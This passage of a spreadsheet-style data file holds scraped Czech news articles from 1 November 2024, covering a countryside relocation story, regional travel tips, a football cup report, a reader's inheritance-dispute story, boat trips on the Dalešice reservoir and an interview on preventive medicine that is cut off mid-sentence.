zájemce. Obrácené chalupářství jim nedávalo smysl Zadařilo se jim až roce. Tehdy už věděli, že není radno dlouho váhat, a tak makléřce hned po prohlídce řekli, že nabídku berou. Před nimi v chalupě šestnáct let nikdo nežil, naposledy ji obývala seniorka, která pak zemřela, a její dědicové chalupu nevyužívali. „Po babičce tu zůstala spousta harampádí, které jsme museli vyklidit – od zubních kartáčků až po bačkory. Dům je sedmadvacet metrů dlouhá nudle, ale jedinou obytnou místností původně byla světnice s umyvadlem a postelí, která vedla směrem do vesnice. V místech dnešní předsíně byla kuchyňka s gaučem a tam, kde máme koupelnu, byly dvě komory. K původní chaloupce pak někdejší majitelé přistavěli ještě kamenný chlívek a cihlovou stodolu,“ přibližuje Lukáš. "Nerada bych, aby to znělo jako ezoblábol, ale člověk je nějak víc v sobě. Praha kvůli inflaci vjemů neumožňuje jen se tak zastavit a vnímat sám sebe. Na venkově to jde vlastně samo." celý článek Zpočátku zamýšleli opravit jen střechu a jinak stavení nechat v původním stavu. Brzy ale zjistili, že se jim po víkendech na venkově nechce do města znovu vracet, a rozhodli se do Železného Újezdu přesunout natrvalo, což už pochopitelně vyžadovalo větší stavební zásahy. Děti přitom byly jak hlavní motivací, tak největším zdrojem pochybností. „Vilda tehdy ještě nebyl na světě, Josefínce byly dva a Kilimu pět, takže už měl v Plzni nějaké kamarády. Měli jsme obavu, jestli nás děti jednou nebudou proklínat, že jsme jim zničili živo</t>
  </si>
  <si>
    <t>123600</t>
  </si>
  <si>
    <t>76670</t>
  </si>
  <si>
    <t>20241101_697_3761494037_946db3e4c906156e5da6.html</t>
  </si>
  <si>
    <t>946db3e4c906156e5da6</t>
  </si>
  <si>
    <t>Zima, déšť, sychravo, že by ani psa nevyhnal? V Ústeckém kraji je řada míst, která vás nadchnou i v nevlídném zimním počasí</t>
  </si>
  <si>
    <t>Zima, déšť, sychravo, že by ani psa nevyhnal? V Ústeckém kraji je řada míst, která vás nadchnou i v nevlídném zimním počasí Reklama 1. listopadu 2024 · 00:00 Víte, že máme v Ústeckém kraji dvě kulturní památky Světového dědictví UNESCO? Od roku 2019 byl zapsán Hornický region Erzgebirge/Krušnohoří, který jako celek názorně dokumentuje proces utváření tohoto území během 800 let trvající hornické činnosti. I v zimě můžete fárat do Štoly Starý Martin v Krupce, která bývala jedním z nejvýznamnějších starých důlních děl krupského revíru. Otevírala jednu z nejbohatších cínových rudních žil – žílu Lukáš. Dolování zde začalo v průběhu 14. století, těžba ustala před druhou světovou válkou. www.montanregion.cz Druhá, vloni zapsaná památka na seznam Světového dědictví je Žatec a krajina žateckého chmele. Zároveň jde o první chmelařskou krajinu na světě, která získala tento status. Zapsaná památka se skládá ze dvou částí, které společně ilustrují cyklus pěstování a zpracování nejznámější odrůdy chmele na světě – Žateckým poloraným červeňákem – a obchodování s ní. Po příjemné procházce historickým centrem Žatce můžete navštívit Chrám chmele a piva , kde na jednom místě v Žatci najdete chmelový maják, chmelový labyrint, pracovnu alchymisty, erbovní síň, galerii Sladovnu a největší chmelařské muzeum na světě. www.chchp.cz Ústecký kraj | Zdroj: Ústecký kraj Kam vyrazit pro dokonalý relax a regeneraci těla i duše? Do města Teplice ! Tohle krásné lázeňské město láká turisty svými lázněmi a termálními prameny, které nabízejí dokonalý odpočinek. Navíc můžete navštívit Thermalium - nejexkluzivnější termální komplex v Česku. www.lazneteplice.cz PR1_ Teplice lázně Beethoven | Zdroj: Ústecký kraj A pokud jste spíše milovníkem přírody, určitě byste měli navštívit teplickou botanickou zahradu. Ve skleníku Tropicana se seznámíte s rostlinami pouští, polopouští, savan, tropických poloopadavých a opadavých lesů. Pohled na tropický deštný les se vám naskytne z lávky, která vede nad paleotropickou částí. Nechybí subtropická expozice a skalničkový skleník. Ústecký kraj | Zdroj: Ústecký kraj Pevnost Terezín , poznejte zapomenutý příběh města a pevnosti. Objevte Terezín , jak ho ještě neznáte. Prozkoumejte modely opevnění, historické plány, obrazy i nálezy staré staletí, které vám ukážou Terezín jako dokonalou pevnost, město plné života i osudů konkrétních lidí. A co více, prozkoumat můžete i labyrint podzemních chodeb a objevit jeho účel. Prohlídka vás zavede do míst, kam se jinak nepodíváte. Vydejte se za svitu luceren do tajemného podzemí Terezína . www.pevnost-terezin.cz Ústecký kraj | Zdroj: Ústecký kraj Rezervace prohlídek nutná. Více tipů na výlety po Ústeckém kraji v zimě najdete na www.branadocech.cz. Ústecký kraj | Zdroj: Ústecký kraj Autor: 1. listopadu 2024 | · | 00:00 || Reklama || Reklama | 1. listopadu 2024 | · | 00:00</t>
  </si>
  <si>
    <t>1530</t>
  </si>
  <si>
    <t>672000</t>
  </si>
  <si>
    <t>20241101_698_3241138965_9bc790f778693c95e517.html</t>
  </si>
  <si>
    <t>9bc790f778693c95e517</t>
  </si>
  <si>
    <t>Hlučínští mohou vyhlížet dalšího zvučného protivníka</t>
  </si>
  <si>
    <t>Hlučínští mohou vyhlížet dalšího zvučného protivníka HLUČÍN Jeho oblíbenou pivnici v Opavě spláchla povodeň. Tudíž v ní trenér fotbalistů Hlučína Lukáš Černín nemohl oslavit středeční pohárový postup přes Liberec . „Ale rád si dám pivo kdekoliv jinde,“ usmíval se po výhře 1:0. Hlučínští se podobně jako v roce 2022 přes Plzeň probili do osmifinále MOL Cupu, českého poháru, přes prvoligového protivníka. „Nedělal bych z toho vědu. Podařilo se nám vyhrát jeden zápas s ligovým týmem. Ve fotbale jsem už nějaký pátek, něco už o něm vím,“ prohlásil Černín , který v první lize odehrál 45 utkání. Všechny za Opavu . Co vůbec Hlučínští o Liberci věděli? „Dívali jsme se na video, ale nebylo to nijak speciálnější oproti naší lize. Jak se soupeři jmenují, jsme věděli z televize,“ usmál se záložník Ondřej Moučka. „Porazili jsme kvalitního soupeře, ale teď na nás budou i tlaky. V sobotu hrajeme v Blansku , tam klidně můžeme prohrát,“ uvědomuje si Lukáš Černín . „Kluci budou mít nynější vítězství v hlavách, ale moje práce je, abych je uhlídal.“ Liberecký trenér Radoslav Kováč hlučínské fotbalisty chválil za obětavost a nasazení. A ocenil mladého útočníka Marka Havrana. „Podal excelentní výkon, měli jsme s ním problémy,“ řekl. „Hrál velmi dobře,“ souhlasil Lukáš Černín . „Marek přišel z devatenáctky. Ze začátku, než si zvykl, měl trochu problémy s mužskou kopanou, ale postupem času vše pochytil. Je tahounem. Stává se pro nás klíčovým hráčem.“ Černín dodal, že se ozval trenér reprezentace U 19 a ptal se, jak Havran, který reprezentoval už v týmu sedmnáctiletých a v Hlučíně je na hostování z Baníku Ostrava , vypadá. „U nás je to jeho první kontakt s mužským fotbalem,“ řekl Černín . „Je to nějakých šest zápasů, co hraje v základní sestavě. Pracuje na sobě. Ukazuje, že by mohl být přínosem, ale ještě to je daleká cesta. Takových hráčů bývá spousta. Záleží na něm.“ Hlučínští jsou v moravskoslezské lize po třinácti kolech čtvrtí, přičemž na první Kroměříž a druhý Třinec ztrácejí třináct bodů. „Ambice máme pořád nejvyšší...“ uvedl Černín . „Jako vše i třetí ligu bychom rádi vyhráli, ale trochu nám uskočil začátek. Třinec a Kroměříž mají dobré týmy, skoro profi, my jsme amatéři, kluci chodí do práce anebo studují. Přesto cíle musejí být vždy ty nejvyšší.“ Další kolo čeká hlučínské fotbalisty až na jaře. Koho by si přáli? „Určitě někoho z Prahy , Slavii , nebo Spartu . Přeju si Spartu,“ odpověděl Ondřej Moučka. „Pohár asi těžko vyhrajeme, to bych byl velký optimista, ale pokud by naše cesta měla v příštím kole skončit, tak s tím nejzvučnějším soupeřem,“ řekl Černín . Takže? „Třeba Sparta , Slavia , Plzeň ... Je nám to jedno, ale ať to je zase nějaký sváteční den, pokud bychom hráli na domácím hřišti.“ Radost Kapitán fotbalistů Hlučína Radim Plesník se za běžícím Vojtěchem Walou raduje z výhry nad Libercem ve třetím kole poháru. Foto: Jiří Seidl 14 duelů Hlučínští v minulých 20 letech odehráli s prvoligovými soupeři v poháru. Plzeň a Liberec vyřadili. Autor: — Jiří Seidl Autor Jiří Seidl</t>
  </si>
  <si>
    <t>20241101_699_3239761654_451c96d2bdf09dd4d94c.html</t>
  </si>
  <si>
    <t>451c96d2bdf09dd4d94c</t>
  </si>
  <si>
    <t>BRATR UŽ JINÝ nebude</t>
  </si>
  <si>
    <t>BRATR UŽ JINÝ nebude Zlata, 51 let naštěstí Vmá podporu rodiny yšla jsem z domku po rodičích a zamykala dveře, když se u plotu objevila sousedka a zavolala na mě. „Co s tím baráčkem budeš dělat, Zlatuško? Už jsi mluvila s Pepou?“ optala se s účastí v hlase. „Mít takového bratra, to je neštěstí…“ Pokrčila jsem rameny: „Ještě jsem s ním nemluvila. Nepřišel ani mámě na pohřeb, nejspíš budu muset zajet za ním,“ zamračila jsem se. „Sama nevím, co mám dělat dřív, musím toho tolik zařizovat!“ „Ty ses přece starala o mámu tolik let! Měl by se stydět, kdyby tě chtěl připravit i o tohle stavení,“ zlobila se sousedka. Věděla jsem, že vyjednávání s bratrem bude těžké. Nechoval ke mně žádné bratrské city a nebyl ochotný k žádnému kompromisu. Když šlo o mě, byl nepřístupný a odmítavý, i když jsem mu nikdy neublížila. Vždycky tvrdil, že mi rodiče nadržovali a dostávala jsem od nich víc než on. Samozřejmě že to nebyla pravda, ale Josef už měl takovou povahu. Záviděl všem kolem sebe, ale sám nehnul ani prstem. Před lety koupili se ženou starý domek na okraji sousední vsi a on v něm zůstal i po rozvodu. Jeho žena před ním utekla do města a já jsem se jí nedivila. Byl to morous a nezacházel s ní dobře. U našich rodičů se Pepa neobjevil celé roky. S otcem se hádal a nesnášel, když mu máma vyčítala jeho nezřízený život. Přitom ho máti měla moc ráda a trápilo ji, jak to s ním dopadá. Ani když rodiče začali mít problémy se zdravím, nenamáhal se bratr, aby se na ně přišel podívat, nebo aby jim aspoň zavolal. Přesto mě pak pomlouval, když jsem po tátově smrti vzala mámu k sobě. Starala jsem se o ni několik let. Po rodičích nám zůstal domek a dva hektary půdy. Byly to spíš pastviny než pole, ale mluvilo se i o tom, že by z nich mohly být stavební pozemky. Ovšem to by se musel změnit územní plán… Věděla jsem, že s Josefem si budu muset promluvit, ale nechtělo se mi do toho. Teď mi sousedka připomněla, že už nemůžu dál čekat, protože si nás jistě už brzo pozve notář. Požádala jsem proto manžela, aby mě k bratrovi zavezl. Netěšila jsem se na jednání s Pepou a můj strach byl oprávněný. „Josefe! Jsi doma?“ zavolala jsem, ale nikdo neodpověděl. Strčila jsem do dveří a vešli jsme dovnitř. Můj bratr seděl na kanapi u kamen, pil z lahve pivo a koukal na televizi. „Hele, ségra se švagrem! Co vy tady děláte?“ ptal se nepříjemně. „Přijeli jsme, abych se s tebou domluvila, co bude s dědictvím po rodičích. Budeme muset k notáři, tak ať se nedohadujeme před ním…“ Josef se zvedl a popošel ke mně tak blízko, až jsem ucítila jeho pivní dech. „O čem se se mnou chceš domlouvat? Mám přece právo na polovinu majetku! Nebo snad ne?“ Trochu jsem couvla, byla jsem ráda, že mi záda jistí manžel. Chtělo se mi utéct, ale věděla jsem, že se prostě nějak domluvit musíme. Nechtělo se mi připomínat, bylo mi to trapné, že o naše rodiče jsem se víc než deset let starala sama, on pro ně nehnul prstem. Už jsem byla rozhodnutá, že Pepovi dám prostě na výběr. „Rodiče nám nechali domek a dva hektary polí. Co chceš ty?“ zeptala jsem se. Bratr se posadil ke stolu, otevřel si další lahev piva a zhluboka se napil. „Jasně že chci barák! Co sis myslela? Že chci pole? Co bych s tím dělal? To by se ti tak líbilo, nechat si střechu nad hlavou a mně dát kus hlíny.“ „Jak myslíš,“ kývla jsem. „Jestli to tak opravdu chceš, budeš muset u notáře podepsat papíry a pak ještě vyřídit převody.“ S úlevou jsem vyšla ven a nadechla se čerstvého vzduchu. Byla jsem vděčná manželovi, že mi stál po boku a že se mi nakonec podařilo něco s Pepou dohodnout. Věděla jsem, že kdyby se bratr zatvrdil, byl by schopen mě klidně tahat po soudech tak dlouho, že by nakonec z dědictví nezbylo nic. Asi za týden po návštěvě u Pepy skutečně přišel úřední dopis, který mě zval k notáři. Věděla jsem, že bratr dostal stejný, tak jsem mu ani nevolala. Překvapilo mě, že on zavolal mně. „Změnil jsem názor,“ šel hned k věci. „Promluvil jsem si s několika lidma, co mají přehled, a rozhodl jsem se, že si radši vezmu pozemky. Ty si nech barák,“ řekl rozhodně. Pochopila jsem, že jeho kamarádi ho nejspíš ponoukali, aby se rozhodl pro polnosti, protože je tu naděje, že když je rozprodá na stavební parcely, přijde si na spoustu peněz. Nejspíš si ale nikdo z nich už nechtěl připustit, že změna územního plánu může trvat dlouho a třeba k ní ani nemusí dojít. „Příští týden máme toho notáře,“ připomněla jsem mu. „Určitě to, Josefe, takhle chceš?“ „Jasně! Chci ty pozemky!“ ujistil mě Pepa a zavěsil. Sešli jsme se pak u notáře a bratr mě překvapil. Vypadal úplně jinak, než jak jsem ho viděla v jeho domácnosti. Upravený, ve slušné košili, dokonce kolem sebe šířil vůni kolínské. Pravda, při úředním jednání a čtení všech dokumentů projevoval netrpělivost, ale vydržel a papíry podepsal. Na rozloučenou mi podal ruku a obdařil mě vítězoslavným úsměvem. Zase jsem si oddechla a zadoufala, že teď už všechno půjde hladce. Těšilo mě taky, že mi nakonec zůstal domek po rodičích, ve kterém jsem vyrůstala. Moc by mě mrzelo, kdyby ho Pepa prodal někomu cizímu, nebo snad ještě hůř, kdyby se pod jeho „péčí“ změnil v úplnou ruinu. Já už jsem si totiž začala vymýšlet plány, jak domek opravit a vylepšit, a i když jsem věděla, že mě čekají starosti a hodně práce, těšila jsem se na to. Vysnila jsem si, že staré stavení přestavím tak, aby v něm bylo několik pokojů pro hosty. Ty bych pak pronajímala zájemcům o agroturistiku. Pepovo rozhodnutí mi tedy hrálo do noty a já se po několikaměsíční přípravě pustila do uskutečňování svých představ. Na opravy a úpravy padly všechny naše rodinné úspory, museli jsme si vzít i půjčku u banky. Všechno to bylo na dlouhé lokte, ale zhruba po roce starání a tvrdé práce, na níž se podílel i můj muž a děti, jsem stála před stavením, které vyhlíželo přesně tak, jak jsem si ho vysnila. Vonělo čistotou a novými omítkami, okna byla plná truhlíků s květinami… Kus práce jsme udělali i na zahradě před domem. Poradila jsem se s rodinou a rozhodli jsme se, že uspořádáme malou slavnost, při které ukážeme náš nový dům sousedům a známým. Všichni byli nadšení, jak se nám přestavba povedla. Syn mi slíbil, že mi na internetu vytvoří stránky, které budou propagovat naši usedlost a lákat zájemce o agroturistiku, aby se v létě náš nový „byznys“ mohl hladce rozjet. A v této době plné nadějí a plánů za mnou přišla návštěva. Objevil se ve dveřích jako duch. Byla jsem ráda, že mám vedle sebe manžela i syna. Pepa se zastavil přede mnou a namířil na mě ukazovák. „Tohle ti nikdy nezapomenu!“ zasyčel zlostně. „Podvedla jsi mě! Šoupla jsi mi ty pozemky a sama sis nechala tohle!“ rukou zamával kolem sebe. „Jako vždycky jsem vyšel naprázdno! Ale já to tak nenechám, ještě o mně uslyšíš!“ začal mi vyhrožovat. V tu chvíli ho manžel se synem popadli a vyhodili z domu, a já, vyděšená, se složila na židli a lapala po dechu. Uvědomila jsem si, že můj bratr už se nikdy nezmění. Vždycky bude závidět všem okolo a já mám jedinou naději, že ho snad nenapadne nic, čím by mohl opravdu ublížit mně, mé rodině nebo opravenému domu. Zároveň mi bylo jasné, že se musím vzpamatovat a dát se do práce, protože půjčka se sama od sebe nesplatí. Když nám zemřeli rodiče, snažila jsem se k Pepovi chovat vstřícně. On ale nikdy nebude spokojený. Asi doufal, že polnosti z dědictví jednou rozprodá na stavební parcely. V příběhu byla změněna jména. Ilustrační foto: Shutterstock</t>
  </si>
  <si>
    <t>20241101_7_3265225631_cfd828350fd005ac9aef.html</t>
  </si>
  <si>
    <t>cfd828350fd005ac9aef</t>
  </si>
  <si>
    <t>Martina Formanová ukázala nového přítele</t>
  </si>
  <si>
    <t>Shrnutí Martina Formanová ukázala nového přítele prima-cnn-news Ostrá hádka o důchody: Nikoho jsme neokradli, rozčílil se Jakob. Podraz, vmetl mu Okamura USA jsou na cestě pryč od klimatické dohody. Trumpův tým už má připravené i další dekrety Sledujte Partii s Výborným a Havlíčkem: Kam až vyskočí ceny potravin v Česku? prima-zeny Jasmina Alagič v absolutních rozpacích. Můžeš si vzít vše, co chceš, řekne akrobatovi Zuzana Bubílková drsně odsoudila seznamky: Jsou pro zoufalce, myslí si Nový pár na líbánkách: Emma a Petr jsou na ostří nože už první večer prima-zoom Nejtěžší americká bitva od Vietnamu Žraloci zabíjejí vydry ve velkém, ale nežerou je. Záhada má prosté vysvětlení Kolik je na světě dohromady peněz? Známe přesnou částku v korunách prima-fresh Alsaský šukrut – vydatný pekáček s vepřovým kolenem, klobásou a kysaným zelím z restaurace Babiččina Beseda Mixér: další porce svatomartinských lahůdek, které můžete letos ochutnat Vychutnejte si Svatomartinská vína 2024: Méně hroznů, více chuti prima-cool Nová trilogie Star Wars dostala tvůrce Největší hororová událost roku je ještě drsnější, než čekáte. První reakce chválí úplně všechno Hvězda Stmívání bude kosit zombíky. V novém filmu se konečně dočká pořádné akce playboy Co vás čeká v listopadovém čísle magazínu Playboy? Šárka Grossová oslavila 55. V bikinách se ale pořád chlubí plochým bříškem Exmanžel chtěl, aby byla vyšší. Modelku prodloužení nohou vyšlo na 4 miliony lajk Jak získat a udržet si partnerku? Musíš hrát na domácím hřišti, radí Těhotnej kuchař Hana Gelnarová slaví vítězství v KSW. Polští fanoušci hovoří o krádeži Jak se doma chovat ráno po prohýřené noci? Těhotnej kuchař baví internet svou poradnou prima-living Autor: FTV Prima</t>
  </si>
  <si>
    <t>20241101_70_3264662820_fef24447a1ada9c7a227.html</t>
  </si>
  <si>
    <t>fef24447a1ada9c7a227</t>
  </si>
  <si>
    <t>Barvy podzimu si turisté na Dalešické přehradě vychutnají i z paluby lodi</t>
  </si>
  <si>
    <t>Barvy podzimu si turisté na Dalešické přehradě vychutnají i z paluby lodi 1. listopadu 2024 18:02 Skalnaté břehy zasazené do podzimních rámů z barevného listí, opuštěné pramice, kormoráni odpočívající na borovicích, pár rybářů. Takové scenerie nyní nabízí okolí Dalešické přehrady . Lidé se přírodou mohou kochat rovnou z vodní hladiny. Stačí nastoupit na výletní loď Horácko . Nádrž brázdí i na podzim a v zimě. „Příroda teď opravdu hýří všemi barvami, všechno je krásně zbarvené – od žluté, oranžové a hnědé až po tóny červené. Když do toho zasvítí i sluníčko, je to nádhera. A oproti létu je tady teď samozřejmě výrazně klidněji,“ popisuje atmosféru kolem vodního díla Milan Jahoda, dlouholetý kapitán výletní lodi Horácko . 12 fotografií Uplynulý víkend se měly konat již poslední pravidelné plavby, vzhledem k příznivé předpovědi počasí ale vyrazí loď na projížďku ještě tuto sobotu 2. listopadu. Vypluje opět z přístaviště Kramolín, a to hodinu po poledni. Do cílového Koněšína dorazí plavidlo za pětašedesát minut a po otočení se vrací zase zpět do kramolínského přístaviště. Zájemci tak mohou na palubě strávit klidně i více než dvě hodiny, anebo se svézt pouze mezi některými stanicemi na trase. Mnozí výletníci volí kombinaci chůze a plavby – nechají se třeba kousek „popovézt“ lodí a zpáteční trasu potom absolvují pěšky. Na Martina se bude na palubě otevírat víno Ani pro nadcházející podzimní a zimní období však sezona vyjížděk ještě zdaleka nekončí. Na svátek svatého Martina , tedy na pondělí 11. listopadu, je v plánu tradiční Svatomartinská plavba. „Je to akce, která se koná už dlouhé roky. Vynechali jsme snad jenom jednou, když ji nebylo možné uspořádat kvůli covidu,“ líčí kapitán. Vyjížďka, jež startuje v deset hodin ráno, je spojena s obligátním otevřením a ochutnávkou letošních mladých svěžích vín pocházejících ze Sádku, jediné vinice a vinařství na Vysočině. Otevřou je podle tradice – přesně jedenáct minut po jedenácté hodině dopolední. OBRAZEM: Loď Horácko na Dalešické přehradě převezla už deset tisíc lidí „Chybět nebude ani porcička netradičně upravené svatomartinské husy a mnohé další dobroty,“ popisuje Milan Jahoda. Ten se těší hlavně na přátelskou atmosféru, s níž je akce vždycky spojena, neboť na ni řada lidí míří již opakovaně. „A z mnohých návštěvníků se tak nakonec postupně stali i naši přátelé,“ usmívá se kapitán. Účast je potřeba si předem rezervovat, podle Jahody však ještě nějaká volná místa jsou. Zajímavé a netradiční zpestření konce roku Na další plavbu se mohou zájemci vydat v neděli 17. listopadu. A loď nebude zahálet ani v prosinci. Dalešice jsou přečerpávací nádrží, a hladina tak v zimě nikdy zcela nezamrzá. Horácko tudíž může přislíbit vyjížďky i na 26. prosinec, silvestr či na Nový rok. „Tyto zimní termíny si u lidí získaly oblibu. Na Štěpána už mají lidé dost cukroví, pohádek i návštěv a rádi si svátky zpestří třeba právě plavbou. A přelom roku je zase zajímavým a netradičním vstupem do dalšího období,“ shrnul Jahoda s tím, že v případě příznivého počasí není ani vyloučeno, že bude ještě nějaký další termín plaveb vypsán. Mapy poskytuje © SHOCart a přispěvatelé OpenStreetMap. Společnost SHOCart je tradiční vydavatel turistických a cykloturistických map a atlasů. Více na www.shocart.cz Autor: Jana Nedělková Autor Jana Nedělková Rubrika transition_slide Metro - Kraj Vysočina</t>
  </si>
  <si>
    <t>20241101_700_3239753701_3ec34f838ebb6834e110.html</t>
  </si>
  <si>
    <t>3ec34f838ebb6834e110</t>
  </si>
  <si>
    <t>Jak ve zdraví utéct nemocem</t>
  </si>
  <si>
    <t>Jak ve zdraví utéct nemocem Rubrika: rozhovor Světová populace stárne neúprosným tempem. Proto je čím dále důležitější pochopit, jak mohou lidé žít déle ve zdraví. Mnohé závažné nemoci se přitom dají odhalit dříve, než vyvolají vážnější zdravotní problémy. „Vědci se neustále snaží zasahovat do procesu stárnutí, existují kliniky zabývající se regenerací buněk nebo úpravou DNA, ale já jsem spíše příznivcem přirozeného stárnutí s maximálním využitím preventivních prohlídek. Tím, co vám může zachránit život, jsou právě preventivní lékařské prohlídky,“ podotýká MUDr. JANA LUPÍNKOVÁ (53), CSc., z kliniky komplexní kardiovaskulární a onkologické prevence EliteMedical. ■ Lidé se dožívají stále vyššího věku, o čemž do jisté míry rozhoduje genetika. Může k dlouhověkosti přispět i lepší životní styl? Zdravý životní styl zcela určitě. Ke zdraví v dlouhém věku vám může pomoci přerušovaný půst (den se rozloží na dvě části, delší, kdy se nejí, a kratší, kdy se jí, pozn. red.), a to z důvodu snížení hmotnosti, posílení imunity, prevence cukrovky, rakoviny, kardiovaskulárních onemocnění a zpomalení procesu stárnutí. Nicméně podle evidence- -based medicine (medicína založená na důkazech, pozn. red.) zatím neexistují studie, které by prokázaly, že právě toto nějak prodlužuje život. Jde spíše o to, prožít dlouhý život ve zdraví. To je to nejdůležitější. Když se dožijete 86 let, ale z toho posledních 10 let strávíte na lůžku, pak taková dlouhověkost asi není úplně to, co byste chtěli. ■ Podlenejrůznějšíchstudiíjeunásvprůměru kvalitní délka života až o 15 let kratší než doba dožití (např. ve Švédsku ten rozdíl činí pouhé tři roky). Jak prakticky dosáhnout toho, aby se délka života ve zdraví prodloužila? Na prvním místě musí být prevence. Je důležité pravidelně absolvovat preventivní lékařské prohlídky a screeningová vyšetření. Ty pomáhají včas odhalit různé zdravotní problémy nebo predispozice k nemocem, což umožňuje zahájit léčbu nebo změnit životní styl dříve, než by došlo k vývoji vážného onemocnění. V České republice jsou dlouhodobě zavedené, a ze zdravotního pojištění plně hrazené, organizované screeningové programy nádorových onemocnění. Díky tomu sledujeme jejich setrvale pozitivní dopad na vývoj epidemiologických trendů incidence (počet nově zjištěných, pozn. red.) a mortality (úmrtnosti, pozn. red.) těchto zhoubných novotvarů. Prevence onemocnění a zdravá dlouhověkost jsou nyní velmi významné cíle moderní medicíny. ■ A chodí lidé na preventivní prohlídky? Bohužel ne. Alarmující je, že preventivních prohlídek u praktického lékaře se v Česku účastní méně než 40 % dospělých. Záleží na socioekonomickém statusu. Někdo je nevyužívá vůbec, někdo chodí každé dva roky a někdo si hradí preventivní vyšetření na různých klinikách sám. To jsou většinou vysokoškolsky vzdělaní lidé, kteří mají finance, vědí, že dvouleté intervaly prevencí jsou málo, a starají se o sebe. ■ Proč jsou preventivníprohlídkypo dvou letech, jež hradí pojišťovna, nedostatečné? Preventivní vyšetření jsou sice u nás hrazena zdravotními pojišťovnami u dospělého člověka každé dva roky, ale to je opravdu málo. Některé typy nádorů totiž rostou velice rychle. Vy jdete na mamograf, máte negativní výsledek, a během čtvrt roku můžete mít rakovinu prsu. Vyšetření lipidového profilu (testy ke stanovení rizika kardiovaskulárního onemocnění, tedy onemocnění cév a srdce, lipidový panel zpravidla zahrnuje i vyšetření hodnot cholesterolu, pozn. red.) je zdarma dokonce jednou za deset let, pokud tedy nemáte jiné rizikové faktory! ■ A není to tak, že zdravotnictví je u nás zdarma a lidi nic finančně nenutí se o své zdraví starat a chodit na prevenci? Přesně tak. Lidé se snaží delegovat starost o zdraví na druhou osobu, na lékaře. Často si myslí, že péče o zdraví není jejich starost, ale doktor má povinnost je vyšetřit. Bohužel se s tím setkávám i u pacientů s různými chronickými onemocněními. Přijde pacient s diabetem a chce, abych mu předepsala prášky. Přitom diabetu druhého typu se můžete úplně zbavit, pokud zhubnete, dodržujete zdravý životní styl a hýbete se. A na doktorovi by pak bylo jen, aby vás sledoval jednou ročně. ■ V jakých zdravotnických oborech má prevence největší význam? Teď máme dvě velká témata prevence – kardiovaskulární onemocnění a nádorové nemoci. Na ně umírají Češi nejčastěji. Ať se při prevenci přijde na cokoliv, třeba i na mírně zvýšený krevní tlak, můžeme to nějakým způsobem ovlivnit. Buď změnou životosprávy, nebo již léčbou. A pakliže se při preventivním vyšetření najde zhoubný nádor bez metastáz, pak všechna tato stadia se dají léčit. Samozřejmě v některých případech jde o rychle rostoucí nádory, na něž běžným vyšetřením nepřijdete. Asi posledním případem karcinomu, kde neexistuje časná diagnostika a ani léčba, je rakovina slinivky. V roce 2023 odstartoval screening lidí s vysokým rizikem rakoviny slinivky. Rakovina slinivky je v ČR třetím nejčastějším typem karcinomu způsobujícím úmrtí. Screening se týká osob, u nichž se karcinom pankreatu vyskytuje v rodině, ohroženi jsou také lidé s tzv. genem BRCA, který je zároveň původcem karcinomu prsu. Na pravidelnou kontrolu by měli chodit i ti, kteří dlouhodobě trpí zánětem slinivky nebo mají diagnózu polypózního syndromu (výrůstky na sliznici v zažívací trubici, pozn. red.). Tyto prohlídky by měly probíhat v centrech digestivní endoskopie. Lékaři na nich dokážou odhalit nemoc v raném stadiu, kdy se ještě nijak neprojevuje, a mohou tak začít s léčbou včas. I díky tomu je možné prodloužit život nemocného na několik let. Na rakovinu slinivky se totiž běžně přijde až velmi pozdě, kdy už je nemoc ve stadiu metastáz. ■ Nejčastější příčinou úmrtí v Česku jsou srdečněcévní nemoci – jedná se zejména o vysoký krevní tlak a onemocnění žil či tepen. Jak jsme na tom ve srovnání s ostatními státy? V roce 2021 byla kardiovaskulární onemocnění v ČR příčinou 41,8 % všech úmrtí, a stala se tak vedoucí příčinou mortality. V počtu zemřelých z kardiovaskulárních příčin na 100 tisíc obyvatel vykazujeme jedny z nejvyšších hodnot mezi státy EU, například u ischemické choroby srdeční šlo v roce 2021 o 5. místo. ■ Zhoubné novotvary jsou dlouhodobě druhou nejčastější příčinou úmrtí v ČR (18 % všech úmrtí) po kardiovaskulárních chorobách… V případě nádorových onemocnění jsou ta čísla neméně alarmující. V roce 2018 bylo každé čtvrté úmrtí v naší zemi na zhoubné nádory, nejčastěji to byly nádory plic, tlustého střeva, slinivky a prostaty. Právě u nádorů slinivky, tlustého střeva a prostaty je úmrtnost vyšší, nižší je u nádorů prsu, byť i tady je statistika neradostná. Ročně je u nás rakovina prsu diagnostikována přibližně osmi tisícům žen, kolem 1 700 z nich umírá. Česko je v Evropské unii na 16. místě, co se týče výskytu onkologických onemocnění, počet nádorů v České republice je cca 590 na sto tisíc obyvatel… Počet zemřelých na nádorová onemocnění u nás do roku 2003 mírně rostl, poté pozorujeme mírný pokles a stabilizaci mortality. Incidence zhoubných novotvarů je dlouhodobě vyšší u mužů než u žen. Prevalence (počet žijících osob s onemocněním, pozn. red.) zhoubných novotvarů je v dlouhodobém trendu na rozdíl od incidence mírně vyšší v populaci žen než v populaci mužů. V mezinárodním srovnání stojí Česká republika v incidenci zhoubných nádorů v Evropě na 16. až 17. místě, u řady onkologických diagnóz však obsazujeme přední místa evropských statistik. ■ Rakovina tlustého střeva a konečníku je jedním z nejčastějších typů rakoviny diagnostikovaných ve vyspělých zemích. V České republice je každý rok zjištěno přibližně 7 000 případů tohoto zhoubného onemocnění a více než 3 000 pacientů na něj každoročně zemře. Proč jsou v Česku tak časté karcinomy tlustého střeva akonečníku? Zaprvé pacienti nechodí na preventivní prohlídky. Od 50 let věku by si měl každý nechat udělat vyšetření na okultní krvácení ve stolici nebo jít na kolonoskopii. A zadruhé je to způsobené tím, že máme špatné stravovací návyky. Vždy to má stejné jmenovatele: tučná strava, málo vlákniny, málo ovoce, málo zeleniny. A k tomu je velmi časté i kouření. Když běžnému Čechovi řeknete, ať omezí červené maso a konzumuje více rostlinné stravy, typicky odpoví, že ty pampelišky jíst nebude… ■ Dosti častý argument odpíračů zdravého životního stylu je příklad bývalého premiéra Spojeného království Winstona Churchilla , který byl obézní, nesportoval, kouřil doutníky, a přesto se dožil 90 let… Velice silným faktorem je genetika. Ta je naprosto zásadní. Neznám genetiku Winstona Churchilla , ale už se asi nikdo nedozví, jestli by se nedožil více, kdyby nebyl obézní a nekouřil… Podívat se na širší rodinnou anamnézu člověka, včetně prarodičů, je naprostý základ. A pokud v rodině otec nebo děda zemřeli na karcinom plic, pak je pravděpodobné, že když bude kouřit syn, dopadne stejně. Pokud má někdo za sebou 20 balíčkoroků – to znamená, že je mu víc než 55 a kouřil 20 let 20 cigaret denně –, pak by měl podstoupit nízkodávkové CT plic. Buď cestou praktického lékaře, 